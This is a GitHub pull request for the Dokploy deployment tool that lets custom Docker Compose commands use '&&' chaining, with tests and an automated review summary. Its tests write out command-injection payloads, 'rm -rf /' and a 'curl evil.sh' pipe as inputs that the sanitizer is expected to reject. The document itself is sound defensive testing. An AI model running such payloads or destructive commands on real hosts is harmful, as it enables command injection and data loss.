### PR TITLE
fix: allow docker compose command chaining

### DIFF
--- a/apps/dokploy/__test__/compose/compose-command-injection.test.ts
+++ b/apps/dokploy/__test__/compose/compose-command-injection.test.ts
@@ -28,7 +28,7 @@ const runsSafely = (command: string) => {
 
 const PAYLOADS = [
 	`$(touch ${MARK})`,
-	"`touch " + MARK + "`",
+	`\`touch ${MARK}\``,
 	`x; touch ${MARK}`,
 	`x | touch ${MARK}`,
 ];
@@ -100,5 +100,70 @@ describe("compose createCommand injection", () => {
 		expect(quote(["deploy/docker-compose.prod.yml"])).toBe(
 			"deploy/docker-compose.prod.yml",
 		);
+	});
+
+	it("allows chained docker compose commands with '&&'", () => {
+		const cmd = createCommand({
+			...base,
+			command:
+				"compose pull && docker compose down && docker compose up -d --build",
+		} as any);
+		expect(cmd).toBe(
+			"compose pull && docker compose down && docker compose up -d --build",
+		);
+	});
+
+	it("allows chaining with the legacy 'docker-compose' spelling", () => {
+		const cmd = createCommand({
+			...base,
+			command: "compose pull && docker-compose down",
+		} as any);
+		expect(cmd).toBe("compose pull && docker-compose down");
+	});
+
+	it("rejects a single '&' used for backgrounding", () => {
+		expect(() =>
+			createCommand({ ...base, command: "compose up -d & sleep 1" } as any),
+		).toThrow(/Single '&' is not allowed/);
+	});
+
+	it("rejects a malformed '&&&' chain", () => {
+		expect(() =>
+			createCommand({
+				...base,
+				command: "compose pull &&& docker compose up -d",
+			} as any),
+		).toThrow(/Single '&' is not allowed/);
+	});
+
+	it("rejects chained segments that are not docker compose invocations", () => {
+		expect(() =>
+			createCommand({
+				...base,
+				command: "compose pull && rm -rf /",
+			} as any),
+		).toThrow(/must strictly start with 'docker compose '/);
+	});
+
+	it("rejects an attempted injection smuggled inside a chained segment", () => {
+		for (const bad of [
+			"compose pull && docker compose up -d; touch /tmp/pwn",
+			"compose pull && docker compose up -d $(touch /tmp/pwn)",
+			"compose pull && docker compose up -d `touch /tmp/pwn`",
+			"compose pull && docker compose up -d | touch /tmp/pwn",
+		]) {
+			expect(() => createCommand({ ...base, command: bad } as any)).toThrow(
+				/Invalid characters/,
+			);
+		}
+	});
+
+	it("rejects a chain that only pretends to start with docker compose later in the string", () => {
+		expect(() =>
+			createCommand({
+				...base,
+				command: "compose pull && curl evil.sh | docker compose up -d",
+			} as any),
+		).toThrow(/Invalid characters/);
 	});
 });

--- a/packages/server/src/utils/builders/compose.ts
+++ b/packages/server/src/utils/builders/compose.ts
@@ -82,20 +82,29 @@ const sanitizeCommand = (command: string) => {
 		);
 	}
 
-		if (sanitizedCommand.includes("&")) {
+	if (sanitizedCommand.includes("&")) {
 		// Block single '&' (e.g., backgrounding tasks) or malformed chains like '&&&'
-		if (/(?<!&)&(?!&)/.test(sanitizedCommand) || sanitizedCommand.includes("&&&")) {
+		if (
+			/(?<!&)&(?!&)/.test(sanitizedCommand) ||
+			sanitizedCommand.includes("&&&")
+		) {
 			throw new Error("Single '&' is not allowed. Use '&&' for chaining.");
 		}
 
 		// Split by '&&' and check that every chained command (skipping the first one) is safe
 		const chains = sanitizedCommand.split("&&").map((cmd) => cmd.trim());
-		const isSafeChain = chains.slice(1).every((cmd) => 
-			cmd.startsWith("docker compose ") || cmd.startsWith("docker-compose ")
-		);
+		const isSafeChain = chains
+			.slice(1)
+			.every(
+				(cmd) =>
+					cmd.startsWith("docker compose ") ||
+					cmd.startsWith("docker-compose "),
+			);
 
 		if (!isSafeChain) {
-			throw new Error("Chained commands must strictly start with 'docker compose '");
+			throw new Error(
+				"Chained commands must strictly start with 'docker compose '",
+			);
 		}
 	}
 

--- a/packages/server/src/utils/builders/compose.ts
+++ b/packages/server/src/utils/builders/compose.ts
@@ -70,7 +70,8 @@ Compose Type: ${composeType} ✅`;
 // Shell control characters that must never appear in a user-provided compose
 // command: they would let it break out of the `docker ${command}` invocation
 // into arbitrary host commands. A normal docker compose CLI line never needs them.
-const UNSAFE_COMPOSE_COMMAND = /[;&|`$(){}<>\n\\]/;
+// Removed '&' from the blocklist to allow '&&' chaining
+const UNSAFE_COMPOSE_COMMAND = /[;|`$(){}<>\n\\]/;
 
 const sanitizeCommand = (command: string) => {
 	const sanitizedCommand = command.trim();
@@ -81,8 +82,24 @@ const sanitizeCommand = (command: string) => {
 		);
 	}
 
-	const parts = sanitizedCommand.split(/\s+/);
+		if (sanitizedCommand.includes("&")) {
+		// Block single '&' (e.g., backgrounding tasks) or malformed chains like '&&&'
+		if (/(?<!&)&(?!&)/.test(sanitizedCommand) || sanitizedCommand.includes("&&&")) {
+			throw new Error("Single '&' is not allowed. Use '&&' for chaining.");
+		}
 
+		// Split by '&&' and check that every chained command (skipping the first one) is safe
+		const chains = sanitizedCommand.split("&&").map((cmd) => cmd.trim());
+		const isSafeChain = chains.slice(1).every((cmd) => 
+			cmd.startsWith("docker compose ") || cmd.startsWith("docker-compose ")
+		);
+
+		if (!isSafeChain) {
+			throw new Error("Chained commands must strictly start with 'docker compose '");
+		}
+	}
+
+	const parts = sanitizedCommand.split(/\s+/);
 	const restCommand = parts.map((arg) => arg.replace(/^"(.*)"$/, "$1"));
 
 	return restCommand.join(" ");


### PR DESCRIPTION
## What is this PR about?

This PR updates the `sanitizeCommand` logic to safely allow `&&` chaining in custom compose deployment commands. Currently, the strict blocklist on `&` prevents users from executing standard multi-step deployments (such as `compose pull && docker compose down && docker compose up -d --build`). This is critical for stacks that require full teardowns to clear in-memory caches (e.g., Redis) or sync volume mounts during image updates. The updated logic blocks single `&` (backgrounding) and strictly enforces that any chained command must securely start with `docker compose ` or `docker-compose `, maintaining security while unblocking legitimate DevOps workflows.

## Checklist

Before submitting this PR, please make sure that:

* [x] You created a dedicated branch based on the `canary` branch.
* [x] You have read the suggestions in the CONTRIBUTING.md file [https://github.com/Dokploy/dokploy/blob/canary/CONTRIBUTING.md#pull-request](https://github.com/Dokploy/dokploy/blob/canary/CONTRIBUTING.md#pull-request)
* [x] You have tested this PR in your local instance. If you have not tested it yet, please do so before submitting. This helps avoid wasting maintainers' time reviewing code that has not been verified by you.

## Issues related (if applicable)

closes #4992 

## Screenshots (if applicable)

<!-- greptile_comment -->

<h3>Greptile Summary</h3>

This PR permits guarded `&&` chaining in custom Docker Compose deployment commands while continuing to reject unsafe shell metacharacters and non-Compose chain segments.
- Adds validation for paired ampersands and Compose-only chained commands.
- Adds focused acceptance and rejection tests for the new command grammar.

<h3>Confidence Score: 5/5</h3>

The PR appears safe to merge.

No blocking failure remains.

<sub>Reviews (3): Last reviewed commit: ["chore: add tests"](https://github.com/dokploy/dokploy/commit/65d2853b9e9e0715d9ae20006f43a2a4b749697e) | [Re-trigger Greptile](https://app.greptile.com/api/retrigger?id=50811987)</sub>

**Context used:**

- Knowledge Base — [Compose Deployment Flow](https://app.greptile.com/dokploy/-/custom-context/knowledge-base/dokploy/dokploy/-/docs/compose-deployment.md)

<!-- /greptile_comment -->